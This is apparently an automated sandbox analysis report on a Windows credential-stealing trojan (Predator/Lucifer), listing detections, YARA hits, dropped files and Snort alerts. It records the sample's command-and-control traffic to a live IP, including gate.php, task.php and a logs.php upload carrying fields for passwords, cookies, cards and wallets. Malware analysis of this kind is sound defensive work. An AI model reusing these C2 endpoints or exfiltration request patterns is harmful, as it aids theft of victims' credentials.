Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
nwY3YpWQVx.exe

Overview

General Information

Sample Name:nwY3YpWQVx.exe
Analysis ID:753097
MD5:0d43b051c7c73233c85697219bc9a4f4
SHA1:0568c7d1b2f340b743f8799166e3c45b7ebf87ef
SHA256:30c03c8a3bb6dc168a799d3399b06863c579e6c22e66a649a8162fa7ca7e370c
Tags:32exeLucifertrojan
Infos:

Detection

Predator
Score:93
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Yara detected Predator
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Machine Learning detection for sample
May check the online IP address of the machine
Found C&C like URL pattern
Yara detected Generic Downloader
Machine Learning detection for dropped file
Moves itself to temp directory
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Yara detected Credential Stealer
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Drops PE files
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • nwY3YpWQVx.exe (PID: 5996 cmdline: C:\Users\user\Desktop\nwY3YpWQVx.exe MD5: 0D43B051C7C73233C85697219BC9A4F4)
    • Zip.exe (PID: 4588 cmdline: "C:\Users\user\AppData\Local\Temp\Zip.exe" MD5: AF07E88EC22CC90CEBFDA29517F101B9)
  • update_222410.exe (PID: 1576 cmdline: "C:\Users\user\AppData\Local\Temp\update_222410.exe" / start MD5: 0D43B051C7C73233C85697219BC9A4F4)
  • update_222410.exe (PID: 3964 cmdline: "C:\Users\user\AppData\Local\Temp\update_222410.exe" / start MD5: 0D43B051C7C73233C85697219BC9A4F4)
  • update_222410.exe (PID: 3424 cmdline: "C:\Users\user\AppData\Local\Temp\update_222410.exe" / start MD5: 0D43B051C7C73233C85697219BC9A4F4)
  • update_222410.exe (PID: 5928 cmdline: "C:\Users\user\AppData\Local\Temp\update_222410.exe" / start MD5: 0D43B051C7C73233C85697219BC9A4F4)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
nwY3YpWQVx.exeJoeSecurity_PredatorYara detected PredatorJoe Security
    nwY3YpWQVx.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      nwY3YpWQVx.exeJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        nwY3YpWQVx.exeINDICATOR_SUSPICIOUS_EXE_References_VPNDetects executables referencing many VPN software clients. Observed in infosteslersditekSHen
        • 0x7d546:$s1: \Vpn\NordVPN
        • 0x80cb0:$s2: \VPN\OpenVPN
        • 0x80d1e:$s3: \VPN\ProtonVPN
        nwY3YpWQVx.exeWindows_Trojan_Lucifer_ce9d4cc8unknownunknown
        • 0x651cd:$a: 00 0A 28 47 00 00 0A 00 DE 02 00 DC 00 28 09 00 00 06 02 6F 48

        Dropped Files

        SourceRuleDescriptionAuthorStrings
        C:\Users\user\AppData\Local\Temp\Zip.exeWindows_Trojan_Lucifer_ce9d4cc8unknownunknown
        • 0x12e5:$a: 00 0A 28 47 00 00 0A 00 DE 02 00 DC 00 28 09 00 00 06 02 6F 48

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000001.00000000.338062732.000001C391992000.00000002.00000001.01000000.00000008.sdmpWindows_Trojan_Lucifer_ce9d4cc8unknownunknown
        • 0xee5:$a: 00 0A 28 47 00 00 0A 00 DE 02 00 DC 00 28 09 00 00 06 02 6F 48
        00000000.00000000.294533919.0000000000632000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_PredatorYara detected PredatorJoe Security
          00000000.00000000.294533919.0000000000632000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000000.294533919.0000000000632000.00000002.00000001.01000000.00000003.sdmpWindows_Trojan_Lucifer_ce9d4cc8unknownunknown
            • 0x64dcd:$a: 00 0A 28 47 00 00 0A 00 DE 02 00 DC 00 28 09 00 00 06 02 6F 48
            00000000.00000002.563811537.0000000002B0D000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Lucifer_ce9d4cc8unknownunknown
            • 0xf635:$a: 00 0A 28 47 00 00 0A 00 DE 02 00 DC 00 28 09 00 00 06 02 6F 48
            Click to see the 7 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            1.0.Zip.exe.1c391990000.0.unpackWindows_Trojan_Lucifer_ce9d4cc8unknownunknown
            • 0x12e5:$a: 00 0A 28 47 00 00 0A 00 DE 02 00 DC 00 28 09 00 00 06 02 6F 48
            0.2.nwY3YpWQVx.exe.2b1b350.0.raw.unpackWindows_Trojan_Lucifer_ce9d4cc8unknownunknown
            • 0x12e5:$a: 00 0A 28 47 00 00 0A 00 DE 02 00 DC 00 28 09 00 00 06 02 6F 48
            0.0.nwY3YpWQVx.exe.695ae8.2.raw.unpackJoeSecurity_PredatorYara detected PredatorJoe Security
              0.0.nwY3YpWQVx.exe.695ae8.2.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                0.0.nwY3YpWQVx.exe.695ae8.2.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  Click to see the 22 entries

                  Sigma Signatures

                  No Sigma rule has matched

                  Snort Signatures

                  Timestamp:192.168.2.513.90.128.25349698802022986 11/24/22-10:05:39.916527
                  SID:2022986
                  Source Port:49698
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.513.90.128.25349701802022818 11/24/22-10:05:49.419418
                  SID:2022818
                  Source Port:49701
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.513.90.128.25349696802022986 11/24/22-10:05:31.007346
                  SID:2022986
                  Source Port:49696
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.513.90.128.25349692802022986 11/24/22-10:05:25.056792
                  SID:2022986
                  Source Port:49692
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.513.90.128.25349698802022818 11/24/22-10:05:39.916527
                  SID:2022818
                  Source Port:49698
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.513.90.128.25349701802022986 11/24/22-10:05:49.419418
                  SID:2022986
                  Source Port:49701
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.513.90.128.25349696802022818 11/24/22-10:05:31.007346
                  SID:2022818
                  Source Port:49696
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:192.168.2.513.90.128.25349692802022818 11/24/22-10:05:25.056792
                  SID:2022818
                  Source Port:49692
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Multi AV Scanner detection for submitted file
                  Source: nwY3YpWQVx.exeReversingLabs: Detection: 88%
                  Source: nwY3YpWQVx.exeVirustotal: Detection: 73%Perma Link
                  Antivirus / Scanner detection for submitted sample
                  Source: nwY3YpWQVx.exeAvira: detected
                  Yara detected Predator
                  Source: Yara matchFile source: nwY3YpWQVx.exe, type: SAMPLE
                  Source: Yara matchFile source: 0.0.nwY3YpWQVx.exe.695ae8.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.nwY3YpWQVx.exe.630000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.nwY3YpWQVx.exe.632203.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.update_222410.exe.12bb0ca8.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.update_222410.exe.12b4cdc0.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000000.294533919.0000000000632000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.397751643.0000000012B4C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: nwY3YpWQVx.exe PID: 5996, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: update_222410.exe PID: 3964, type: MEMORYSTR
                  Multi AV Scanner detection for domain / URL
                  Source: http://13.90.128.253Virustotal: Detection: 6%Perma Link
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Local\Temp\Zip.exeReversingLabs: Detection: 76%
                  Machine Learning detection for sample
                  Source: nwY3YpWQVx.exeJoe Sandbox ML: detected
                  Machine Learning detection for dropped file
                  Source: C:\Users\user\AppData\Local\Temp\Zip.exeJoe Sandbox ML: detected
                  Source: 0.0.nwY3YpWQVx.exe.630000.0.unpackAvira: Label: TR/Dropper.Gen
                  Source: nwY3YpWQVx.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: nwY3YpWQVx.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: System.Windows.Forms.pdbwY3YpWQVx.exe' source: nwY3YpWQVx.exe, 00000000.00000002.573995000.000000001B98E000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Windows.Forms.pdb source: nwY3YpWQVx.exe, 00000000.00000002.573995000.000000001B98E000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.pdb source: nwY3YpWQVx.exe, 00000000.00000002.573995000.000000001B98E000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \gom_v_4.0\Zip\Zip\obj\Debug\Zip.pdb source: nwY3YpWQVx.exe, Zip.exe.0.dr
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.pdb, source: nwY3YpWQVx.exe, 00000000.00000002.573941215.000000001B983000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbM8( source: nwY3YpWQVx.exe, 00000000.00000002.585222189.000000002023F000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: c:\Temp\Json\Working\Newtonsoft.Json\Src\Newtonsoft.Json\obj\Release\Newtonsoft.Json.pdb source: nwY3YpWQVx.exe, Newtonsoft.Json.dll0.0.dr, Newtonsoft.Json.dll.0.dr
                  Source: Binary string: \gom_v_4.0\update_windows10\update_windows10\obj\Debug\update_windows10.pdb source: nwY3YpWQVx.exe
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeCode function: 4x nop then dec eax0_2_00007FF9A63CD2E7
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeCode function: 4x nop then dec eax0_2_00007FF9A63CA1A9
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeCode function: 4x nop then dec eax0_2_00007FF9A63CDAEB
                  Source: C:\Users\user\AppData\Local\Temp\Zip.exeCode function: 4x nop then dec eax1_2_00007FF9A63D9DB9
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeCode function: 4x nop then dec eax7_2_00007FF9A63C6EEE
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeCode function: 4x nop then dec eax12_2_00007FF9A63C6EEE

                  Networking

                  barindex
                  Snort IDS alert for network traffic
                  Source: TrafficSnort IDS: 2022986 ET TROJAN Generic Request to gate.php Dotted-Quad 192.168.2.5:49692 -> 13.90.128.253:80
                  Source: TrafficSnort IDS: 2022818 ET TROJAN Generic gate .php GET with minimal headers 192.168.2.5:49692 -> 13.90.128.253:80
                  Source: TrafficSnort IDS: 2022986 ET TROJAN Generic Request to gate.php Dotted-Quad 192.168.2.5:49696 -> 13.90.128.253:80
                  Source: TrafficSnort IDS: 2022818 ET TROJAN Generic gate .php GET with minimal headers 192.168.2.5:49696 -> 13.90.128.253:80
                  Source: TrafficSnort IDS: 2022986 ET TROJAN Generic Request to gate.php Dotted-Quad 192.168.2.5:49698 -> 13.90.128.253:80
                  Source: TrafficSnort IDS: 2022818 ET TROJAN Generic gate .php GET with minimal headers 192.168.2.5:49698 -> 13.90.128.253:80
                  Source: TrafficSnort IDS: 2022986 ET TROJAN Generic Request to gate.php Dotted-Quad 192.168.2.5:49701 -> 13.90.128.253:80
                  Source: TrafficSnort IDS: 2022818 ET TROJAN Generic gate .php GET with minimal headers 192.168.2.5:49701 -> 13.90.128.253:80
                  May check the online IP address of the machine
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeDNS query: name: ip-api.com
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeDNS query: name: ip-api.com
                  Source: C:\Users\user\Desktop\nwY3YpWQVx.exeDNS query: name: ip-api.com
                  Source: C:\Users\user\AppData\Local\Temp\Zip.exeDNS query: name: ip-api.com
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeDNS query: name: ip-api.com
                  Source: C:\Users\user\AppData\Local\Temp\Zip.exeDNS query: name: ip-api.com
                  Source: C:\Users\user\AppData\Local\Temp\Zip.exeDNS query: name: ip-api.com
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeDNS query: name: ip-api.com
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeDNS query: name: ip-api.com
                  Source: C:\Users\user\AppData\Local\Temp\update_222410.exeDNS query: name: ip-api.com
                  Found C&C like URL pattern
                  Source: global trafficHTTP traffic detected: POST /wp-content/lock/logs.php?hwid=CH84D70FD1B3&Passwords=0&CreditCards=0&Cookies=0&AutoFill=0&Wallets=0 HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------8dace08a809cd1aHost: 13.90.128.253Content-Length: 794515Expect: 100-continue
                  Yara detected Generic Downloader
                  Source: Yara matchFile source: nwY3YpWQVx.exe, type: SAMPLE
                  Source: Yara matchFile source: 0.0.nwY3YpWQVx.exe.695ae8.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.nwY3YpWQVx.exe.630000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.nwY3YpWQVx.exe.632203.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.update_222410.exe.12bb0ca8.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.update_222410.exe.12b4cdc0.3.raw.unpack, type: UNPACKEDPE
                  Source: Joe Sandbox ViewASN Name: MICROSOFT-CORP-MSN-AS-BLOCKUS MICROSOFT-CORP-MSN-AS-BLOCKUS
                  Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.com
                  Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/gate.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.com
                  Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/gate.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/gate.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.com
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: POST /wp-content/lock/logs.php?hwid=CH84D70FD1B3&Passwords=0&CreditCards=0&Cookies=0&AutoFill=0&Wallets=0 HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------8dace08a809cd1aHost: 13.90.128.253Content-Length: 794515Expect: 100-continue
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/gate.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Host: ip-api.com
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: global trafficHTTP traffic detected: GET /wp-content/lock/task.php?hwid=CH84D70FD1B3 HTTP/1.1Host: 13.90.128.253
                  Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                  Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.90.128.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.90.128.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.90.128.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.90.128.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.90.128.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.90.128.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.90.128.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.90.128.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.90.128.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.90.128.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.90.128.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.90.128.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.90.128.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.90.128.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.90.128.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.90.128.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.90.128.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.90.128.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.90.128.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.90.128.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.90.128.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.90.128.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.90.128.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.90.128.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.90.128.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.90.128.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.90.128.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.90.128.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.90.128.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.90.128.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.90.128.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.90.128.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.90.128.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.90.128.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.90.128.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.90.128.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.90.128.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.90.128.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.90.128.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.90.128.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.90.128.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.90.128.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.90.128.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.90.128.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.90.128.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.90.128.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.90.128.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.90.128.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.90.128.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.90.128.253
                  Source: nwY3YpWQVx.exe, 00000000.00000002.564864359.0000000002BE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://13.90.128.253
                  Source: nwY3YpWQVx.exeString found in binary or memory: http://13.90.128.253/wp-content/lock
                  Source: nwY3YpWQVx.exe, 00000000.00000002.564864359.0000000002BE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://13.90.128.253/wp-content/lock/gate.php?hwid=CH84D70FD1B3
